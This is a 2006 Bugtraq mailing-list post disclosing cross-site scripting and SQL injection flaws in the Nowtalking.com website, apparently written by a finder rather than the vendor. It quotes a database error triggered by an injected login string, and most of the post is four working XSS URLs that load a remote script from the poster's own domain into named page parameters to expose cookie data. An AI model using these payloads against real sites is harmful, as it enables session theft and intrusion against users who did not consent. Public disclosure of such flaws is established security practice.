[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060610225533.3012.qmail@securityfocus.com>
Date: 10 Jun 2006 22:55:33 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Nowtalking.com - XSS
Nowtalking.com
Homepage:
http://www.nowtalking.com
Effected files:
input boxes of logging in and searching
friends-new.asp
gallery.asp
friends.asp
gb.asp
JET DB error due to injection:
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'UserName = '' or ''''.
/login.asp, line 61
---------------------------------------
Friends-New.asp XSS vulnerability:
It seems our cookie data is output on the screen via this XSS vuln:
http://www.nowtalking.com/login/friends-new.asp?friendname=<script%20src=http://www.youfucktard.com/xss.js></script>&friendnumber=9
Screenshot: http://www.youfucktard.com/xsp/nt1.jpg
--------------------------------------
Gallery.asp XSS vulnerability, this time by changing the usernumber to a negative #:
http://www.nowtalking.com/login/gallery.asp?username=[script src=http://www.youfucktard.com/xss.js]</script>&usernumber=-78
Screenshot:http://www.youfucktard.com/xsp/nt2.jpg
-----------------------------------
Friends.asp XSS Vuln, again with changing usernumber to a negative:
http://www.nowtalking.com/login/friends.asp?usernumber=-9&username=<script%20src=http://www.youfucktard.com/xss.js></script>
Screenshot: http://www.youfucktard.com/xsp/nt3.jpg
----------------------------------
Gb.asp XSS Vulnerability:
http://www.nowtalking.com/login/gb.asp?username=<script%20src=http://www.youfucktard.com/xss.js></script>&usernumber=-9
Screenshot: http://www.youfucktard.com/xsp/nt4.jpg
-----------------------------------
Powered by blists - more mailing lists